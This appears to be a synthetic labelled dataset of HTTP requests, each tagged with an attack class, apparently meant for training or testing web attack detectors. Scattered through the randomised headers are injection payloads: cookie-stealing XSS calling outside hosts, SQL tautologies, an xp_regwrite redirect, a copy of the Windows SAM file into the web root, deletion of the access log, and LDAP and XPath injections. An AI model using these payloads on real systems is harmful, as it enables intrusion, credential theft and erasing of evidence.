If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: "HJ5J1nlZ9dk_1cYV"
If-None-Match: "_clmkQ9TIrz0pU6"
If-Range: "4.JV.yFYeE-kl2@q2"
Max-Forwards: 904
MIME-Version: 0.2
Pragma: u0can=lu
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Digest nonce
Range: -3
Referer: /75lra.tar
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 9.2; et-Ha; rv:4.3.6) Gecko/51368294
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 331x628
Via: uiepw/0.2 107.134.83.203, 2.7 33.220.207.79
Transfer-Encoding: gzip
Upgrade: kxea/4.4, ru5/6.4, ttftd/1.9
Warning: 804 42.58.149.196:9978 "tyrid0" "Sat, 31 Mar 07 01:18:34 UTC"
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 3733669583698502
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43340
Start - Id: 35107
class: SqlInjection
GET /uA/im4UOqh7tn@2/uette5gpdslnE.cfm?p0ne9mt=bspysliaaHhl2&etcP@N_childDe6Ki=4s0lax&eh=7m%2F+rhihttpsdnw&eeNiIlTehSisi=c%27wshutdowncuituA&neTdw=140&pd=035068462&Mk=iHks9&eoas=eAM&dmolmjt6nnlno=180821&9runos=na&clUrlausob=iehynjhl%29&saeiQnomgn4or2o=iEdt5T&nl=eec2harnilmuvto8 HTTP/1.0
Host: 160.100.162.191
Connection: Sca5r6
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: oaEtsrti=aDrs
Client-ip: 85.43.136.15
Cookie: nmajx9le=%ssgroup byb;0qf5P_sDMkA=psonu it7&tohahtpassa5sc;IqZ6Z=;alter table nell   set   password    =     'Eh'     where   name  =     'Mer7hn';
Cookie2: $Version="40"
Date: Thu, 27 Dec 07 11:36:16 GMT
ETag: W/"81loHr9KD.A9I2L"
From: tTr0@lIe8cdv.be
If-Modified-Since: Fri, 16 Jun 06 20:49:31 UTC
If-Unmodified-Since: Mon, 24 Jul 06 23:03:52 CET
If-Match: *
If-None-Match: *
If-Range: "VLq9-_FdJyCFK5jI6Jsu"
Max-Forwards: 88
Pragma: aets5e2='nmcelnm'
Proxy-Authorization: 4jeeY frnt=3ai5
Authorization: Digest username="onacnday"
Range: 1474-,6761-8
Referer: http://www.Edbh8.net/NGfso/wmkqa/ghueetr/7asesin/e6at.mp3
TE: deflate,trailers,trailers
Trailer: Trailer
User-Agent: rFfEsog (v2vLE0YPs; jYk8UnJK; tYrhugMK3; dkso70Ryu; tYnNlkkKjr)
UA-CPU: Sparc
UA-Pixels: 142x4166
Via: HTTP/0.4 www.wcsee.tiff, 0.4 www.esr6nA.css
Upgrade: rss/3.7, haei/8.7
Warning: 203 120.19.118.98 "fhlnSveaeersx7asnre" 
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35107
Start - Id: 46851
class: XSS
POST /ibSudCi/rsihatEnd4erofsn/-lri.f4nTLUM/jatsnnttewua7h9wAS8e/mah4a/WooL_GfSdC/fho/eNrg0tn4sYam/jo.oYusrdb0xsZCEq/euPl/cth2zqe-I3qK11o7CvP.shtml? HTTP/1.0
Content-Length: 409
Content-Language: Pe,isor
Content-Encoding: compress
Content-Location: /vycredrs/eseitw.jpg
Content-MD5: bWxhc2Fhc2dzd3RybmVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 23:37:27 CET
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: www.osoer.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, compress;q=0.7, deflate;q=0.3, compress
Accept-Language: *
Cache-Control: max-age=126
Client-ip: 116.169.8.10
Cookie: nmaalirs7=cViokP9clakenrT3;io=;tmpaoem)eYtytprocessing-instructionie;idPehmfirpcbi=0;Anclfs6V=xa;qAusrkM=7eylat)talll Aee;1gueMOaccess_log51pUM=rdwe3ras
Cookie2: $Version="455"
Date: Thu, 24 Aug 06 20:37:00 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Fri, 30 Jun 06 08:08:30 UTC
If-Unmodified-Since: Tue, 29 Jan 08 19:51:14 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 458
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: NTLM dHRyeWVzdTdvaXZoaWdoeDZzaG9odDNoZHRldXRzaWVlc2V0b2xk
Range: -85
Referer: /Z3uo/3twecM.asmx
TE: trailers,trailers
Trailer: Referer
User-Agent: tbEzUKn http://www.oDCjj.uk
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 www.vrdrda.html, 5.0 www.rtdH5A.html:7
Transfer-Encoding: identity
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c6r=41&assszbSpeca=vvq2irsPYZl&arriskp=d>iframeea&t0ats0mNw=nt503iwl&qgYg-IXdropX2null=6568&h4Qb=zeutht1t\documentaservices&ocz=teri&Etdu=50673192&vMzV__=897384&hitahhr0iliiowe=wtqB1silaor6ew&pEoMhdtahsaa=<div style   =    " width:    expression([document.location.replace    ('http://www.iltrnsar.com/cgi-bin/annttiicel.cgi'+document.cookie);]);  " >&le=oet%

End - Id: 46851
Start - Id: 35074
class: SqlInjection
GET /emoQM4fo7tsnTrs/eesse2ny/etes.jpg?eorpotasrxmhEb=3376&hotst3=ceeahrob9x4x0a&r0eedmIlssfhO=e1tE.jns HTTP/1.1
Host: www.tmbseftn.de
Connection: 2arpaEt
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: '    OR  'snN1btna'  >    'S
Accept-Language: *;q=0.1
Date: Fri, 21 Apr 06 04:01:46 UTC
ETag: "8J.PtOrQ4ynhF_j5"
Expect: D4dntne
If-Unmodified-Since: Sun, 07 Nov 04 24:14:36 CET
If-Range: "2FqMtHKa7-2rIVaD"
Max-Forwards: 7
Referer: /sfcn/alAa.asp
User-Agent: Mozilla/4.1 (Windows; U; Win 9x 8.9; 8o-ds; rv:8.2.1) Gecko/29749747
UA-CPU: MIPS
UA-OS: Linux
----: -----------------------------------------

null

End - Id: 35074
Start - Id: 41471
class: SqlInjection
PUT /eA-WEM/u7z5/VC9P/gisias/ms7ntoteh/OPher49ed1usO6/md4/5QfzYWQ4@8S/S_1execP5UVd4/7tk7rsmTF/mChJ59l/iyDHpy.jpeg? HTTP/1.1
Content-Length: 31
Content-Language: eivrvlsi,eOs
Content-Encoding: deflate
Content-Location: http://gh5taIdh.uk/hiMNae.asp
Content-MD5: T21iZXVyZXR0cmJtb2luOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Mar 09 13:27:54 UTC
Last-Modified: Fri, 26 Jun 09 10:45:15 GMT
Host: 136.4.119.128
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mletuvds-7sahh;q=0.4
Cache-Control: max-stale=74306
Client-ip: 79.61.119.137
Cookie: ageu=32182;62oV2P=rcpsepvwo%isnmsbc+eallsock_streame;teunensR=alessr-ny;Nehw6epsat=8;2n=2
Cookie2: $Version="39"
Date: Sat, 14 Feb 04 06:05:45 UTC
ETag: "WmWw5By6q9UJ5oawex"
Expect: 100-continue
From: t0cih@nlhtfemb7.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Wed, 02 May 07 21:36:52 GMT
If-Match: "IMoV9M_MRk@qK@0cdtf2"
If-None-Match: *
If-Range: Tue, 13 May 08 09:19:50 UTC
Max-Forwards: 6
MIME-Version: 2.4
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Digest username="syteln"
Range: 863-,45-,1-
Referer: http://www.atrsn.org/xiAliih/mep0b/lvusm/sern/latcla.jpeg
TE: trailers
Trailer: Pragma
User-Agent: hwsoryott
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: HTTP/4.8 www.ssfhae.htm
Transfer-Encoding: identity
Upgrade: duea/0.0
Warning: 249 www.uAeCe.html "trBe" "Sun, 14 Jan 07 18:57:15 GMT"
X-Forwarded-For: 246.217.24.171
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7oao='   OR  ''  =  '

End - Id: 41471
Start - Id: 49741
class: XPathInjection
GET /9donnuetp/fGWe/AmjgDmrfiIinru/qVjpassthruCQC/ltBqnS98T5zwHpMHZP/m@xhttpL3@E/rDXNX-bJUg9vrX/2FylVZWVkSUSER/hBsgh1v9J/tFfHDMMOmfN.shtml?cleaseOku=eTleetn5m8%29bhadminbduJ&SdOteI=skNcQOoXs&ame=7761674&awvrm=op%7EefikXizr+wastyle&is6ip=00&oSg29H=26&r4eetbtsH=hnnh&fdiv.HjTv=ml%249C&ywieacrsee=%28i+++++%3C+++count%282cazd4%2Fchild%3A%3Atext%28%29%29+++++and+j++++%3C+++count%28ed%2Fchild%3A%3Acomment%28%29%29++and+++++k+++%3C+count%286sau%2Fchild%3A%3A*%29+%29 HTTP/1.1
Host: 68.114.57.162
Connection: keep-alive
Accept: image/gif;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: senc-5eu4lc1, yeccmlal-Rsa;q=0.4
Cache-Control: no-transform
Client-ip: 24.134.122.55
Cookie: jPuu=v0o$s|ciy t;fom=hAncr;jbeR4ttAan=45977217
Cookie2: $Version="05"
Date: Sun, 29 May 05 04:54:59 CET
ETag: "-Dc1ZeBRZlf3FwUe"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 25 Jul 04 06:35:32 GMT
If-Unmodified-Since: Mon, 17 Sep 07 19:33:54 CET
If-Match: "zFGa_ZtFIeAuOvrGVK"
If-None-Match: *
If-Range: "l8UmGJBfikP0i.2"
Max-Forwards: 57
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -1702
Referer: /8oelS.swf
TE: trailers,gzip;q=0.9
Trailer: Connection
User-Agent: iGenyp6Ii
UA-CPU: x86
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4005x8626
Via: 8.9 www.r1oO.html:9630, FTP/0.6 169.37.150.117:903, 0.9 www.dulcobw8.htm:446
Transfer-Encoding: deflate
Upgrade: rsmt7a/2.2, ysy/1.0
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49741
Start - Id: 42815
class: OsCommanding
POST /r4t@sc.SePek/udegmower/delete8MEmwT4nDb/taIhwDIVQM7_z/6l10emza4sztonmec/iaccess_log/8opbIhhyreetxYtc/yct/tsalnefezaaEREll.css? HTTP/1.1
Content-Length: 129
Content-Language: ia,nii,h2dSDts
Content-Encoding: gzip
Content-Location: /ttpt6c.sh
Content-MD5: aWhuMXVlNGhxb21JY2dkdw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Jun 09 14:16:13 UTC
Last-Modified: Wed, 23 May 07 02:23:16 GMT
Host: 154.150.192.54:80
Connection: dxeo
Accept: image/*, text/*;q=0.3
Accept-Charset: x-mac-hebrew, utf-7;q=0.3, windows-1252, x-mac-roman;q=0.2, hz-gb-2312;q=0.8
Accept-Encoding: deflate;q=0.3, deflate, deflate;q=0.7, compress, gzip
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 3.250.89.30
Cookie: Ndmv=r;tyrohzc=iptvvyu
Cookie2: $Version="445"
Date: Sat, 20 Nov 04 23:07:17 CET
ETag: "DpzBK@3z5lqS4vlaus"
If-Modified-Since: Sun, 05 Mar 06 06:48:36 UTC
If-Unmodified-Since: Tue, 18 Aug 09 19:48:14 GMT
If-Match: "Ko3ikK-moe7XWzx"
If-None-Match: *
If-Range: *
Max-Forwards: 9400
Proxy-Authorization: Digest nonce
Authorization: NTLM ZWU2aEh0ZDBtaGdiZ3JlZXJ2dGVuZzN0ZXJ4dHR1dmFlYm9HbnJubFN3c3Rp
Referer: /WlYRpn/Hgrtxn/omieeOa.cgi
User-Agent: Mozilla/5.2 (Windows; U; Windows NT 7.5; rr-pe; rv:9.8.7) Gecko/81851099
UA-Pixels: 0367x479
Via: ith/4.9 www.A7s8.htm
Transfer-Encoding: identity
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

sy=6&geye7geeihe0go=100.154.224.17   |  copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd&Dsyenkeh5p=910676

End - Id: 42815
Start - Id: 41850
class: SqlInjection
GET /K4jri/1135V6Xd4/p3@F2ZNdy_xKbR/UFcat4DmeZ/UHHKXlqKXn/8euserue/g67Tan5Kby/G42tet4Eu5/h4d8.aejpZFYs/iwsHgioahfiesonubt/3tl/ooio2o.swf?8ri=aeehsstdine+nluz%7C+&Rebs3yaik=oK-6yybm&gmMh1sma=Ecnfnhennkrfhet&dledieTntjou=sm&oAhreeEet=%27+OR+%27oenuoa%27+++++BETWEEN+++%27R%27++++AND++++%27T&Zk0-2Wj=x5 HTTP/1.0
Host: 177.123.213.164:80
Connection: tshrody
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: i-cpnte;q=0.0, eazn-r4a79, sn93tpsy-dgero, noeAr-hlIa1on;q=0.5, tqHw8-t;q=0.7
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: ros=tCHD4i;onpgxINe4w=2;asheyCtirTe=entr
Cookie2: $Version="7"
Date: Tue, 03 Jun 08 07:26:01 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Fri, 10 Jun 05 17:32:58 UTC
If-Unmodified-Since: Sat, 17 Jan 09 06:37:10 UTC
If-Match: "l-GQLSH_WHdBbLiKgFA"
If-None-Match: *
If-Range: Tue, 11 Jul 06 04:47:57 GMT
Max-Forwards: 0553
MIME-Version: 1.6
Pragma: wftSdxh=saeirif
Proxy-Authorization: Basic ajU1aXBLYTM6b2R5ZW5EbjU=
Authorization: trzlai 6oadtc=6ostB
Range: 73381-69805,4-176585
Referer: /0ciundsa/bldln.cgi
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: ai0bm9o3 (n9sNjR; n0QtDqxIVl; eWDV@BST)
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: compress
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 219.12.246.47
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41850
Start - Id: 38713
class: LdapInjection
GET /rehotralthhuxc7/aVA1mKJopeniE5rc/Efri7rp2ew8b5aaptDa/tEds5SrydtTheaniavas/qaArEeilegrs/1bngEcAFOMwindow.openXZfl/lvisTaTsxHe/zyOBJUc-x6d9_Q_GY.sh?ljrhldsims=%26+&jEtlCytsi=okWZAuG&eUoUOftepyewc=grChyhu%3Aw6A0+1&ojonio=07953238&eAigaoetsAE=puffat&oq@V_fy=gfaefruuzuNSeteLlo&sbUU1=en&efree0=ceax+gOli4%3At&ie8nSlswii=manddyEm&aOo=oeleatyE&insertQRHwO2t8p=rtc&84Gt8tio5=71%29%28%26%28objectClass%3Dasy%29%28%7C%28sn+%3D+bts%29%28cn%3Dtu+++++J*%29%29&lrlgTetono1tme=3%3Bnr+tsaEsur%2B&nh=96D9eHr9i HTTP/1.0
Host: www.gwen.ch
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=05476
Client-ip: 95.161.31.177
Cookie: nae0aayE4iMirNr=6;rHK3LF=gBl;spnteiIseyn0cn=9ncMqadt9ahmn;rcp9copyKr=sdocument:;trodnthnroTsyi=8518751111;etwgtEr6utb6cl=3n
Cookie2: $Version="248"
Date: Wed, 14 Oct 09 08:35:50 GMT
ETag: "IbfqiJ1ViGIz7bZFRsy"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Wed, 15 Jul 09 21:27:24 GMT
If-Unmodified-Since: Tue, 16 Aug 05 19:37:39 UTC
If-Match: "bUEMNSvpAnphiU4zRZb"
If-None-Match: *
If-Range: Sun, 18 Apr 04 13:08:26 UTC
Max-Forwards: 097
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: Basic dmF6NWhzOncyZW9ldDc=
Range: 557810-
Referer: http://brl4rma.st/sisrab/maaaale/iotolnn/tfiio.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.4 (X11; U; Solaris 0.6; 1e-lr; rv:3.6.6) Gecko/84183848
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: HTTP/7.2 www.euAe.shtml, HTTP/6.7 72.200.125.131:6
Transfer-Encoding: gzip
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38713
Start - Id: 43146
class: OsCommanding
GET /yinpce01t/saDthdkcwdbtc/00/YP7rmftpK8/iIhw-1Hxu/2inonttadua/hnpYgsv3ryv@@n/rtthc/ewehexsrkliiiTe.php4?mrzpeCr9Eptina=954875856&ycIrfceoo=bcseEeOaoirzgTihSh&proitgnta=38327&hexo5dee=%250arm+++-f++++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++++%3B&tvCvanoelewo=r60nlGYa&tarnfEsom=nmc&stiKsotmu=%3Aes&2pca6ttV=7288169&eznrwd6ea=4746&Fag=e&gpk.fJBk=iX6.vus&or6=68113681&oboiev3rl5ci9f=ehetxesoTozth HTTP/1.0
Host: 195.91.114.145:5
Connection: rLspn
Accept: */*
Accept-Charset: koi8-r;q=0.8, ks_c_5601-1987, shift_jis, utf-7
Accept-Encoding: 
Accept-Language: ot-jyqekm, cvsta-i4dh;q=0.7, FoIw-inEns
Cache-Control: max-age=91
Client-ip: 66.158.131.150
Cookie: mnnHro7=1;seetagllS=iUSZn;soveim=usNi;npyubfl8n=BEpoo5o4adt
Cookie2: $Version="11"
Date: Fri, 19 Nov 04 10:08:32 UTC
ETag: "xp7WlUFTEtl@0cqPOnSz"
Expect: riuusi2e=neiyivtb
From: riAeyrh@tgaMea.st
If-Modified-Since: Wed, 27 Oct 04 01:09:11 UTC
If-Unmodified-Since: Thu, 28 Aug 08 02:51:09 UTC
If-Match: "oUAIxRo4fdxA6VYt"
If-None-Match: "mhjSf-DRCZu.Wxk.J5"
If-Range: "Dr1UN7YVdxvt-oIEZ_i"
Max-Forwards: 39
MIME-Version: 2.9
Pragma: cg8ho=0eHwo
Proxy-Authorization: cenn vpwg=rlsiiwt
Authorization: edserI rUz4lnq=e8Ee9
Range: 46359-,93372-15,76-
Referer: http://n1fon.com/roidh/a38aohr/o1jcbee.js
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.0 (Windows; U; Win 9x 4.0; ec-ne; rv:7.5.1) Gecko/58244415
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 699x046
Via: 9.4 138.92.104.80:13
Transfer-Encoding: identity
Upgrade: Iur/4.0, hdo/8.3, gni/0.5, ntt7e1/5.3
Warning: 854 50.62.44.9:3189 "2eaaior" "Sat, 19 Feb 05 12:47:49 UTC"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 197146981100118
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43146
Start - Id: 44499
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.olmmw.fr
Connection: keep-alive
Accept: text/*;q=0.6
Accept-Charset: x-mac-turkish, shift_jis, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 224.120.218.101
Cookie: 3mo=bqee;mN8=dautoexec47ochilde;enate=824791710;nmdofaltwoduov7=1Rc-0_B-
Cookie2: $Version="20"
Date: Mon, 04 Dec 06 17:25:36 GMT
ETag: "IUVO4qgAnfRz99rZqxh"
Expect: 100-continue
From: trtanl@hpchnnll.de
If-Modified-Since: Mon, 05 Nov 07 20:53:43 GMT
If-Unmodified-Since: Tue, 07 Jul 09 10:23:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 098
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM c2hhdTB0b3RpY29rdHBUMmVlVHI1bWhnaW93ZGxvZWVmcnM=
Range: -80,3-,-9028
Referer: /ftemw/ta8lnt.conf
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.6 (compatible; MSIE 3.9; Win 9x; re9rditi)
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: FTP/4.0 2.248.65.229:8462
Transfer-Encoding: deflate
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44499
Start - Id: 41126
class: SqlInjection
GET /aaVixY0GZroeeUE6mt@8/bLXuzfKljxTpANi./fPvF4oYo-ceWVy/I9entytSep/phulIr0sV6/tuFq/nz-WRzaQ86jsPH8W-j1O/nsucngebmif5.dll?y5ao=exec+xp_regwrite+++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ifaoja9e4z%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&t7OuiOigrntk=eR31jR0Q6 HTTP/1.1
Host: www.rybn.gov:44
Connection: 3sgm
Accept: */*
Accept-Charset: iso-8859-1
Accept-Encoding: gzip;q=0.0, compress, deflate;q=0.0, identity;q=0.9
Accept-Language: iosrnsp4-oyohrei, D-s
Cache-Control: max-stale=23715
Client-ip: 104.85.29.24
Cookie: hz=hzuoezu0;allEoP=elsah70nO3oownean;9OM5_fG=tFtwC_;Qxre4riajli=oB5.;aw8a=800412;oiokn1ebsnaAi0e=eEG
Cookie2: $Version="3"
Date: Sat, 22 Apr 06 22:32:14 CET
ETag: W/"2aTlPu50dA@UKfxeZq"
If-Modified-Since: Tue, 08 Jan 08 22:48:23 CET
If-Unmodified-Since: Wed, 15 Apr 09 07:47:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 328
Pragma: no-cache
Authorization: kknwh 9eoe8nl=fNaroe
Referer: http://NZCermh.gov/6iserdT/i0xPXWuc/ephaaa/6shmoh.fgf
User-Agent: Mozilla/1.1 (compatible; maba4oei4t; Windows NT; Chintayz)
UA-CPU: 68000
UA-Disp: 731,4085,32
Via: FTP/4.8 www.Egtwio.shtml, FTP/7.9 69.251.42.230
Transfer-Encoding: deflate
Warning: 894 www.t2teem.tiff:4 "hItafp" 
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41126
Start - Id: 38107
class: LdapInjection
GET /h70H_sruVezc6n/dsuntmahnsCobs/7vJQHS7IPGV@Qnn.RG3C/js.jsp?qrleste=5H1TV&deor=gtimstmgToTms&U5OH=15&5sh=35752319&EdkgrusptltN=mmR%29%28%26%28objectClass%3D+kSe*%29&hsBwncoaqlc=of%3A2otaainsert&hG9Eworhttps=5E&4ii9=3r HTTP/1.0
Host: 126.254.110.110:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.8, identity;q=0.4
Accept-Language: o-tmr;q=0.6, itmstfi5-ysowuo;q=0.9, Teuarel-gaslrdnf;q=0.2, utbttoi-he;q=0.2, qcereT-7ue;q=0.7
Cache-Control: min-fresh=3
Client-ip: 223.239.75.68
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="3"
Date: Thu, 02 Oct 08 12:42:07 CET
ETag: "Zj4yOJLgWxL5jkoqj"
Expect: yzytf=wi36hMoe
From: gnhjruh@dteigtlw.biz
If-Modified-Since: Thu, 09 Jul 09 07:04:49 GMT
If-Unmodified-Since: Mon, 08 Oct 07 01:50:31 GMT
If-Match: "-do@nSPAOBoysd0"
If-None-Match: *
If-Range: Mon, 20 Jun 05 12:46:55 UTC
Max-Forwards: 1
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: ntddnv dr9t=oezhv
Authorization: Digest response="611D89e5d2CEa6Fc2EC3E6B420C42D6a"
Range: -26705,8389-9530,6-32
Referer: http://didsl91.fr/tfEo/2Dhd.css
TE: chunked,deflate;q=0.7,trailers
Trailer: Trailer
User-Agent: ue0hc (oe5A7MN_d; pCybBNK5p; oeOrXQSWbf; w9ImsO-MkJ)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: HTTP/3.2 149.27.137.253
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 992 186.91.149.99:23 "TrsuteIBc" 
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38107
Start - Id: 47974
class: XSS
GET /rVxK3/uc2/led5uvsellmai/EnBsNxiEnuendsta8oe/a9Le5YE046QDHXs/sVFEJ.B/eilab.bin?Egtdoyo=opendeletertt&GbsoehusiJxtq=4319&.rNGR0ddocumentqCR=updatenull%26ensn%5Ct%2Frusr&m0Asi6r4w4ase4=ebThe&tte2=dpOs+pallUiolu&eeeEcynt6mdn=EeeDU&er=974665&ecit5iiz=24345734&pAE=ts&eheaAtmeref=0&arst3hntzau=iiOlAahaoboFruEdi&dim9=nr&taZ=orrnHgER%5C%3Bunullw&6IGyidf2NO=%3Clink++rel++%3D++%22+++stylesheet+++++%22+href++%3D%22+++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F160.49.255.12%2Fto.php%27%2Bdocument.cookie%29%3B%5D+++%22++%3E HTTP/1.0
Host: www.t2aihdzsS.uk:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ia-tuo;q=0.7, e3-ewtnI;q=0.9, omodde-h;q=0.6, szr3Sro-4t;q=0.2
Cache-Control: min-fresh=55126
Client-ip: 233.73.193.14
Cookie: eHae=zselect
Cookie2: $Version="0"
Date: Fri, 05 Jun 09 22:50:12 GMT
ETag: W/"iceaUEb.qmGV7uoTgOY"
Expect: 100-continue
From: etro@rlateera.gov
If-Modified-Since: Sat, 27 Mar 04 24:47:05 CET
If-Unmodified-Since: Fri, 22 Sep 06 08:58:54 CET
If-Match: *
If-None-Match: *
If-Range: "KS@_rDCk9NsUb.kxDdDr"
Max-Forwards: 986
MIME-Version: 0.3
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: saeMvi u5li=itna
Range: 3229-,-51,25363-27158
Referer: /RjkomhRt/pphroadt/eailsa/tnlPh.php4
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: eO.7tPB http://www.mdlNh.net
UA-CPU: MIPS
UA-Disp: 305,820,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 480x167
Via: HTTP/9.1 www.v2fhrel2.jpg, FTP/9.4 www.etojy.js
Transfer-Encoding: compress
Upgrade: eat/7.3, imnF/6.2, 5tcs/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

